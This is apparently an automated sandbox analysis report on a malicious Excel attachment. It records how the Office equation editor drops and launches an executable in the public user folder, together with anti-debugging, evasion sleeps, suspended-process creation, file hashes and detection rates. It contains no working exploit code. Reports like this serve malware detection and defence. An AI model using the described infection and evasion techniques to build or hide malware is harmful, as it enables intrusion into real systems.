Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: vbc.exe, 00000004.00000000.473834838.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.698040978.0000000000230000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.698210832.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: vbc.exe.2.dr, .win32[1].exe.2.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87C9FA8A.emf

Jump to behavior

Source: global traffic

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0140092D	4_2_0140092D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0141E13E	4_2_0141E13E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013A3DF6	4_2_013A3DF6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_014198F0	4_2_014198F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01400880	4_2_01400880
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013E574E	4_2_013E574E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013A57BF	4_2_013A57BF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01405792	4_2_01405792
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013A3606	4_2_013A3606
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01404E15	4_2_01404E15
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013A46DE	4_2_013A46DE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01405EB0	4_2_01405EB0

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe

Code function: String function: 0140BDBF appears 61 times

PE file contains strange resources

Source: .win32[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .win32[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe 736330AAA3A4683D3CC866153510763351A60062A236D22B12F4FE0F10853582

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: _FM_BUSAN_HOCHIMINH_.xlsx	Virustotal: Detection: 38%
Source: _FM_BUSAN_HOCHIMINH_.xlsx	ReversingLabs: Detection: 35%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$_FM_BUSAN_HOCHIMINH_.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRFA55.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.expl.winXLSX@4/20@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

Window detected: Number of UI elements: 21

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_014004C6 push ecx; ret

4_2_014004D9

PE file contains sections with non-standard names

Source: .win32[1].exe.2.dr	Static PE information: section name: .00cfg
Source: vbc.exe.2.dr	Static PE information: section name: .00cfg

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952

Thread sleep time: -240000s >= -30000s

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_014119B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_014119B9

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0140A9D6 mov eax, dword ptr fs:[00000030h]

4_2_0140A9D6

Source: C:\Users\Public\vbc.exe	Code function: 4_2_014119B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		4_2_014119B9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_013FFC48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_013FFC48

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_01400125 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_01400125

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0141C3A6 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

4_2_0141C3A6

ID:	573118
Product:	CloudBasic
Start time:	09:10:03
Start date:	16.02.2022
Sample:	_FM_BUSAN_HOCHIMINH_.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	9d7bf0f2fbb81660c8b91c2a323fde4e
SHA1:	7adf1d60fd08b3accd3a8e58fbdcc674bd1b02ee
SHA256:	d60188bc3e17e3fe9a8353a5eb4b791316968f3c1cea1e4e88138718efec0611
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	9052D06C6AC53471F8496263F8FEF2EB	73016558C8353509B15CD757063816369E9ABFA7	736330AAA3A4683D3CC866153510763351A60062A236D22B12F4FE0F10853582
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\364E3B76.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\53C8C381.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56B0538E.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	5EB99F38CB355D8DAD5E791E2A0C9922	83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA	5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FD2FA65.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	E46357D82EBC866EEBDA98FA8F94B385	76C27D89AB2048AE7B56E401DCD1B0449B6DDF05	B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6157F522.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3	22FEC44258BA0E3A910FC2A009CEE2AB	BF6749433E0DBCDA3627C342549C8A8AB3BF51EB	5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6EA96328.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3	22FEC44258BA0E3A910FC2A009CEE2AB	BF6749433E0DBCDA3627C342549C8A8AB3BF51EB	5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87C9FA8A.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	BE871EA2D026762E96E3DDBDB386F589	66FA5F1942CA698B189EA90C885C5A468B99A312	EA25DD3B6161C5D8C8D4FE64B3D2105F158391DF08991A28ACD0D8B0A0D176C6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8CB27180.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92ED0EF4.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	5EB99F38CB355D8DAD5E791E2A0C9922	83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA	5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC3008FF.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CB03F909.png	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced	590B1C3ECA38E4210C19A9BCBAF69F8D	556C229F539D60F1FF434103EC1695C7554EB720	E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D68EB503.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	E46357D82EBC866EEBDA98FA8F94B385	76C27D89AB2048AE7B56E401DCD1B0449B6DDF05	B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED74FEBB.png	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced	590B1C3ECA38E4210C19A9BCBAF69F8D	556C229F539D60F1FF434103EC1695C7554EB720	E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
C:\Users\user\AppData\Local\Temp\~DF0E35C54C087F7535.TMP	CDFV2 Encrypted	9D7BF0F2FBB81660C8B91C2A323FDE4E	7ADF1D60FD08B3ACCD3A8E58FBDCC674BD1B02EE	D60188BC3E17E3FE9A8353A5EB4B791316968F3C1CEA1E4E88138718EFEC0611
C:\Users\user\AppData\Local\Temp\~DF2D24CE383036F6FE.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF6D2E29A086E66B49.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFE7F835AEEEC2A8C9.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\~$_FM_BUSAN_HOCHIMINH_.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	9052D06C6AC53471F8496263F8FEF2EB	73016558C8353509B15CD757063816369E9ABFA7	736330AAA3A4683D3CC866153510763351A60062A236D22B12F4FE0F10853582

Windows Analysis Report
_FM_BUSAN_HOCHIMINH_.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report _FM_BUSAN_HOCHIMINH_.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
_FM_BUSAN_HOCHIMINH_.xlsx